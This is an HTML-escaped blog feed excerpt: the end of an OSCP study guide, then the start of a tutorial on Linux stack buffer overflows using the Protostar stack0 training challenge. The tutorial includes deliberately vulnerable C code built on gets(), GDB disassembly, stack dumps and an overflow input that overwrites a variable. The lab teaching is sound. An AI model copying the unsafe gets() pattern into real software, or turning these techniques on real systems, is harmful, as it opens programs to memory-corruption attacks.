&lt;p&gt;Well then! It seems you have made it to the end of this journey (well not your OSCP journey if you decide to pursue it!). If you read this entire guide, I certainly give you props for doing so. If you read only parts of it, then I still give you props because the main thing that is important to me is that you learned something from it!&lt;/p&gt;

&lt;p&gt;I hope you are able to use my guide in your OSCP journey and are able to learn some new things, just like I did when I started mine. If this guide was able to help you, let me know; I want your feedback for sure. I thanked a lot of people for helping me with my journey in this guide, and I want to thank them again for their time and contributions in helping me learn and grow in the cyber-security field.&lt;/p&gt;

&lt;p&gt;If anyone has any questions or feedback about this guide, please let me know; you can reach out to me on Twitter, Discord, or NetSecFocus!&lt;/p&gt;

&lt;h2 id=&quot;tj-null&quot;&gt;TJ Null&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt;Twitter: &lt;a href=&quot;https://twitter.com/TJ_Null&quot;&gt;https://twitter.com/TJ_Null&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Github: &lt;a href=&quot;https://github.com/tjnull&quot;&gt;https://github.com/tjnull&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;Netsec Focus: Tjnull&lt;/li&gt;
  &lt;li&gt;Discord: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Tjnull#1788&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;P.S: Considering this journey as an extra mile, I am going to have to insist at this point for you to…… Try Harder! -Offensive Security&lt;/p&gt;
</description>
            <pubDate>Thu, 06 May 2021 00:00:00 +0000</pubDate>
        </item>
        
        <item>
            <title>Reverse Engineering and Exploit Development Made Easy - Chapter 3</title>
            <link>/exploit/dev/2020/02/15/Reverse-Engineering-and-Exploit-Dev-Chapter-3.html</link>
            <guid isPermaLink="true">/exploit/dev/2020/02/15/Reverse-Engineering-and-Exploit-Dev-Chapter-3.html</guid>
            <description>&lt;h3 id=&quot;reverse-engineering-and-exploit-development-made-easy---chapter-3-linux-bofs&quot;&gt;Reverse Engineering and Exploit Development Made Easy - Chapter 3: Linux BOFs&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;:&lt;/strong&gt;&lt;strong&gt;~&lt;/strong&gt;&lt;strong&gt;# ./im_back&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Hello again fellow geeks! I’m back, bringing you another exciting chapter! I know I know, you’ve missed me. But I’m here to stay now!&lt;/p&gt;

&lt;p&gt;In this chapter, we will dive into the basics of Linux exploitation. You will see that in many ways, Linux exploitation is quite similar to Windows.&lt;/p&gt;

&lt;p&gt;Most concepts learned in the past will be applied here, so I suggest that you go through the previous chapters before going through this one.&lt;/p&gt;

&lt;p&gt;With that being said, let us dive right in!&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;:&lt;/strong&gt;&lt;strong&gt;~&lt;/strong&gt;&lt;strong&gt;# ./intro&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;To understand the basics of Linux exploitation, we will be looking at the first form: Stack buffer overflows.&lt;/p&gt;

&lt;p&gt;We will start by learning memory corruption, which will give us a good understanding of how memory is treated in Linux, and from there we will gradually make our way into developing a complete exploit.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;:&lt;/strong&gt;&lt;strong&gt;~&lt;/strong&gt;&lt;strong&gt;# configure&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Protostar’s exploit exercises VM (https://exploit-exercises.lains.space/protostar/) is a great resource that will help us on our journey, along with OverTheWire’s Narnia wargame.&lt;/p&gt;

&lt;p&gt;So grab an ISO from Protostar and set it up in your virtual machine manager of choice. I will be using VirtualBox as always. We will use ssh to log into this VM (run &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;hostname -I&lt;/code&gt; inside the VM to get its local IP).&lt;/p&gt;

&lt;p&gt;The default credentials for Protostar are user:user.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;:&lt;/strong&gt;&lt;strong&gt;~&lt;/strong&gt;&lt;strong&gt;# setup&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;For Linux, the choice of debuggers isn’t as varied as on Windows. Throughout our journey, we will mainly be using GDB (the GNU Debugger), the standard debugger shipped with most Linux distributions. You can alternatively use EDB.&lt;/p&gt;

&lt;p&gt;As we progress, we will see how we can pimp GDB up to do all sorts of cool tricks, and develop exploits with ease (spoiler alert: gdb-peda 😉).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;:&lt;/strong&gt;&lt;strong&gt;~&lt;/strong&gt;&lt;strong&gt;# ./code_analysis&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;To see the source code of the challenge, we have to navigate to the exploit exercises website, where the source code for all challenges is given. We will be starting with the Stack0 challenge, which focuses on memory corruption. Take a look at the code below:&lt;/p&gt;

&lt;div class=&quot;language-c highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;cp&quot;&gt;#include&lt;/span&gt; &lt;span class=&quot;cpf&quot;&gt;&amp;lt;stdlib.h&amp;gt;&lt;/span&gt;&lt;span class=&quot;cp&quot;&gt;
#include&lt;/span&gt; &lt;span class=&quot;cpf&quot;&gt;&amp;lt;unistd.h&amp;gt;&lt;/span&gt;&lt;span class=&quot;cp&quot;&gt;
#include&lt;/span&gt; &lt;span class=&quot;cpf&quot;&gt;&amp;lt;stdio.h&amp;gt;&lt;/span&gt;&lt;span class=&quot;cp&quot;&gt;
&lt;/span&gt;
&lt;span class=&quot;kt&quot;&gt;int&lt;/span&gt; &lt;span class=&quot;nf&quot;&gt;main&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;kt&quot;&gt;int&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;argc&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;kt&quot;&gt;char&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;**&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;argv&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;k&quot;&gt;volatile&lt;/span&gt; &lt;span class=&quot;kt&quot;&gt;int&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;modified&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;kt&quot;&gt;char&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;buffer&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;64&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;];&lt;/span&gt;

  &lt;span class=&quot;n&quot;&gt;modified&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;n&quot;&gt;gets&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;buffer&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;

  &lt;span class=&quot;k&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;modified&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;n&quot;&gt;printf&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;you have changed the &apos;modified&apos; variable&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\n&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
  &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;else&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;n&quot;&gt;printf&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;Try again?&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\n&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
  &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;The includes just import the usual C headers. stdlib.h is the general-purpose standard library header, covering memory allocation, process control, etc.&lt;/p&gt;

&lt;p&gt;unistd.h provides access to the POSIX operating system API, in the same spirit as the standard library.&lt;/p&gt;

&lt;p&gt;stdio.h is the standard input/output header, which declares the I/O functions (including the gets() and printf() used here).&lt;/p&gt;

&lt;p&gt;The main function declares two variables: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;buffer&lt;/code&gt;, a character array that holds 64 bytes, and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;modified&lt;/code&gt;, a volatile integer. The volatile qualifier tells the compiler that the value may change in ways it cannot see, so it must re-read the variable from memory each time instead of caching it or optimising the later check away. The main function also takes the usual argc and argv command-line arguments.&lt;/p&gt;

&lt;div class=&quot;language-c highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;kt&quot;&gt;int&lt;/span&gt; &lt;span class=&quot;nf&quot;&gt;main&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;kt&quot;&gt;int&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;argc&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;kt&quot;&gt;char&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;**&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;argv&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;k&quot;&gt;volatile&lt;/span&gt; &lt;span class=&quot;kt&quot;&gt;int&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;modified&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;kt&quot;&gt;char&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;buffer&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;64&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;];&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;modified&lt;/code&gt; is initially set to 0, and the line below that is responsible for reading a line of our input into buffer. The function that does this is &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;gets()&lt;/code&gt;.&lt;/p&gt;

&lt;div class=&quot;language-c highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt; &lt;span class=&quot;n&quot;&gt;modified&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
 &lt;span class=&quot;n&quot;&gt;gets&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;buffer&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Now here is where our vulnerability lies: in the gets() function. The problem with gets() is that if we enter a string longer than 64 bytes, gets() does no check on the size whatsoever; it keeps reading our input from stdin and writing it onto the stack until it finds a newline. This means our string will OVERFLOW past the given buffer of 64 bytes and start to overwrite other variables, until our string ends.&lt;/p&gt;

&lt;p&gt;In this case, we need to change the value of the modified variable, which is located somewhere on the stack. The if/else conditions tell us that we succeed once we change the value of the modified variable from 0 to anything else (i.e. not equal to (!=) 0).&lt;/p&gt;

&lt;div class=&quot;language-c highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;k&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;modified&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;printf&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;you have changed the &apos;modified&apos; variable&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\n&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;else&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;printf&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;Try again?&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\n&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Alrighty then! Now that we have analysed the code completely, let us start debugging the binary in order to understand where our variables lie on the stack, and how our input affects it. I will be using GDB to debug the binary.&lt;/p&gt;

&lt;p&gt;So first, fire up the Protostar VM, and use the command &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;hostname -I&lt;/code&gt; to display the local IP address of the VM. I suggest that you use a Bridged Adapter while setting up the VM, and set the adapter to the current interface that’s being used. That way, the VM will be on your network and you can easily ssh into it. Binaries are located in &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/opt/protostar/bin/&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;:&lt;/strong&gt;&lt;strong&gt;~&lt;/strong&gt;&lt;strong&gt;# ./debugging&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;To open the binary in GDB, we will use the command &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;$ gdb stack0&lt;/code&gt;, followed by the command &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;(gdb) disas main&lt;/code&gt;, which will disassemble the main function for us. What you see is a representation of the binary in assembly.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;0x080483f4 &amp;lt;main+0&amp;gt;:	push   %ebp
0x080483f5 &amp;lt;main+1&amp;gt;:	mov    %esp,%ebp
0x080483f7 &amp;lt;main+3&amp;gt;:	and    $0xfffffff0,%esp
0x080483fa &amp;lt;main+6&amp;gt;:	sub    $0x60,%esp
0x080483fd &amp;lt;main+9&amp;gt;:	movl   $0x0,0x5c(%esp)
0x08048405 &amp;lt;main+17&amp;gt;:	lea    0x1c(%esp),%eax
0x08048409 &amp;lt;main+21&amp;gt;:	mov    %eax,(%esp)
0x0804840c &amp;lt;main+24&amp;gt;:	call   0x804830c &amp;lt;gets@plt&amp;gt;
0x08048411 &amp;lt;main+29&amp;gt;:	mov    0x5c(%esp),%eax
0x08048415 &amp;lt;main+33&amp;gt;:	test   %eax,%eax
0x08048417 &amp;lt;main+35&amp;gt;:	je     0x8048427 &amp;lt;main+51&amp;gt;
0x08048419 &amp;lt;main+37&amp;gt;:	movl   $0x8048500,(%esp)
0x08048420 &amp;lt;main+44&amp;gt;:	call   0x804832c &amp;lt;puts@plt&amp;gt;
0x08048425 &amp;lt;main+49&amp;gt;:	jmp    0x8048433 &amp;lt;main+63&amp;gt;
0x08048427 &amp;lt;main+51&amp;gt;:	movl   $0x8048529,(%esp)
0x0804842e &amp;lt;main+58&amp;gt;:	call   0x804832c &amp;lt;puts@plt&amp;gt;
0x08048433 &amp;lt;main+63&amp;gt;:	leave  
0x08048434 &amp;lt;main+64&amp;gt;:	ret
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;So right off the bat, even if you don’t understand assembly too well, you can see the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;call&lt;/code&gt; instruction, calling the function &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;gets()&lt;/code&gt; at the address &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;0x0804840c&lt;/code&gt;. This will come in handy during testing.&lt;/p&gt;

&lt;p&gt;So a few things before we continue:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;ESP is our stack pointer. This points to the start/top of the stack.&lt;/li&gt;
  &lt;li&gt;PUSH is an instruction which pushes a value stored in a particular register to the top of the stack.&lt;/li&gt;
  &lt;li&gt;JMP is an instruction which jumps to a particular address to continue execution flow. JE is “jump if equal”, which means that after the comparison (the test instruction), if the condition is satisfied, execution jumps to said location. This represents the “if-else” branch in our code.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Our objective here is to change the value of the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;modified&lt;/code&gt; variable from 0 to anything else. Modified is somewhere on the stack, and in order to overwrite it with our desired value, we will have to overflow a section of the stack that lies before this variable in order to reach it.&lt;/p&gt;

&lt;p&gt;There is one line in the disassembly that is particularly interesting though. It moves the value of 0 (hex 0x0) to the location &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;esp + 0x5c&lt;/code&gt;.
This tells us the location of the modified variable on the stack. Now, we will use the previous call instruction, and this one to set our breakpoints. A breakpoint is a pause in the execution flow of the binary, which will help us in understanding how values on the stack change after a particular instruction is executed.&lt;/p&gt;

&lt;p&gt;We will do this by executing:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;(gdb) break *0x0804840c
Breakpoint 1 at 0x804840c: file stack0/stack0.c, line 11.
(gdb) break *0x08048411
Breakpoint 2 at 0x8048411: file stack0/stack0.c, line 13.
(gdb)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;This will stop the execution flow before the call to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;gets()&lt;/code&gt; is made, and after that, before the value of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;modified&lt;/code&gt; is transferred to the accumulator (eax) for comparison. Now, let’s run the binary by executing &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;r&lt;/code&gt;.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;(gdb) r
Starting program: /opt/protostar/bin/stack0

Breakpoint 1, 0x0804840c in main (argc=1, argv=0xbffffd54) at stack0/stack0.c:11
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;So we hit our first breakpoint, right before the call to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;gets()&lt;/code&gt;. If we run &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;i r&lt;/code&gt;, it will give us further information on the registers at this point of time.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;(gdb) i r
eax            0xbffffc5c	-1073742756
ecx            0x644d8780	1682802560
edx            0x1	1
ebx            0xb7fd7ff4	-1208123404
esp            0xbffffc40	0xbffffc40
ebp            0xbffffca8	0xbffffca8
esi            0x0	0
edi            0x0	0
eip            0x804840c	0x804840c &amp;lt;main+24&amp;gt;
eflags         0x200282	[ SF IF ID ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;We can see that the address of the call instruction is in the EIP register. EIP holds the address of the next instruction to be executed. Now, let’s take a look at what the stack looks like right now by executing &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;x/32wx $esp&lt;/code&gt;. This will print 32 hexadecimal words off the stack; 32 has just been chosen for simplicity.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;(gdb) x/32wx $esp
0xbffffc40:	0xbffffc5c	0x00000001	0xb7fff8f8	0xb7f0186e
0xbffffc50:	0xb7fd7ff4	0xb7ec6165	0xbffffc68	0xb7eada75
0xbffffc60:	0xb7fd7ff4	0x08049620	0xbffffc78	0x080482e8
0xbffffc70:	0xb7ff1040	0x08049620	0xbffffca8	0x08048469
0xbffffc80:	0xb7fd8304	0xb7fd7ff4	0x08048450	0xbffffca8
0xbffffc90:	0xb7ec6365	0xb7ff1040	0x0804845b	0x00000000
0xbffffca0:	0x08048450	0x00000000	0xbffffd28	0xb7eadc76
0xbffffcb0:	0x00000001	0xbffffd54	0xbffffd5c	0xb7fe1848
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;We can use this to find the location of the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;modified&lt;/code&gt; variable. To find the address, we execute &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;x/wx $esp+0x5c&lt;/code&gt;, as we know from earlier that the variable is stored at the location &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;$esp+0x5c or 0x5c(%esp)&lt;/code&gt;. The &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;x&lt;/code&gt; command stands for ‘examine’, with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;w&lt;/code&gt; selecting 4-byte words and the trailing &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;x&lt;/code&gt; hexadecimal output, so this will give us the address and the contents of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;modified&lt;/code&gt;.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;(gdb) x/wx $esp+0x5c
0xbffffc9c:	0x00000000
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;From this, we can see that the address of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;modified&lt;/code&gt; on the stack is &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;0xbffffc9c&lt;/code&gt;, and it contains 0. So if we correspond this with our stack print from earlier, this is where &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;modified&lt;/code&gt; is:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;                          These are contents
           |---------------------|----------------------|
           |                                            |
0xbffffc90: 0xb7ec6365	0xb7ff1040 0x0804845b 0x00000000 &amp;lt;---- modified

Addresses:  0xbffffc90  0xbffffc94 0xbffffc98 0xbffffc9c
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Each address here is 4 bytes apart, and the contents of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;c90&lt;/code&gt; are given after the colon. If we add 4 bytes to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;c90&lt;/code&gt; three times, until we reach the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;0x00000000&lt;/code&gt; word, we get the address &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;c9c&lt;/code&gt;. This is how the math works out in GDB.&lt;/p&gt;

&lt;p&gt;Now, let’s continue execution flow by executing &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;c&lt;/code&gt;. Then, let’s just enter a few A’s just as a test. That way, we will know the location of our buffer on the stack.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 2, main (argc=1, argv=0xbffffd54) at stack0/stack0.c:13
13	in stack0/stack0.c
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;We hit our second breakpoint, which is right before the binary moves the value of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;modified&lt;/code&gt; to EAX for the comparison (the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;if-else&lt;/code&gt; branch). Now, let’s take a look at the stack:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;(gdb) x/32wx $esp
0xbffffc40:	0xbffffc5c	0x00000001	0xb7fff8f8	0xb7f0186e
0xbffffc50:	0xb7fd7ff4	0xb7ec6165	0xbffffc68	0x41414141
0xbffffc60:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc70:	0x41414141	0x41414141	0xbffffc00	0x08048469
0xbffffc80:	0xb7fd8304	0xb7fd7ff4	0x08048450	0xbffffca8
0xbffffc90:	0xb7ec6365	0xb7ff1040	0x0804845b	0x00000000 &amp;lt;-----
0xbffffca0:	0x08048450	0x00000000	0xbffffd28	0xb7eadc76
0xbffffcb0:	0x00000001	0xbffffd54	0xbffffd5c	0xb7fe1848
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;So the hexadecimal value of A is 0x41. We can see our A’s starting at &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;0xbffffc5c&lt;/code&gt; (the last word of the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;0xbffffc50&lt;/code&gt; row) and filling the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;0xbffffc60&lt;/code&gt; row. This matches the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;lea 0x1c(%esp),%eax&lt;/code&gt; in the disassembly, since 0xbffffc40 + 0x1c = 0xbffffc5c, so our buffer starts at this address. We can also see that we still have not reached the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;modified&lt;/code&gt; variable, which is why we haven’t been able to overwrite its value. Remember the size of our buffer? 64. &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;modified&lt;/code&gt; sits at &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;0xbffffc9c&lt;/code&gt;, exactly 64 bytes past the start of the buffer, so anything beyond 64 characters lands on it. If we enter about 80 A’s, we should be able to overflow into the modified variable and change its value. Let’s give this a shot:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/stack0

Breakpoint 1, 0x0804840c in main (argc=1, argv=0xbffffd54) at stack0/stack0.c:11
11	in stack0/stack0.c
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 2, main (argc=1, argv=0xbffffd54) at stack0/stack0.c:13
13	in stack0/stack0.c

(gdb) x/32wx $esp
0xbffffc40:	0xbffffc5c	0x00000001	0xb7fff8f8	0xb7f0186e
0xbffffc50:	0xb7fd7ff4	0xb7ec6165	0xbffffc68	0x41414141
0xbffffc60:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc70:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc80:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffc90:	0x41414141	0x41414141	0x41414141	0x41414141 &amp;lt;----
0xbffffca0:	0x41414141	0x41414141	0x41414141	0xb7eadc00
0xbffffcb0:	0x00000001	0xbffffd54	0xbffffd5c	0xb7fe1848
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

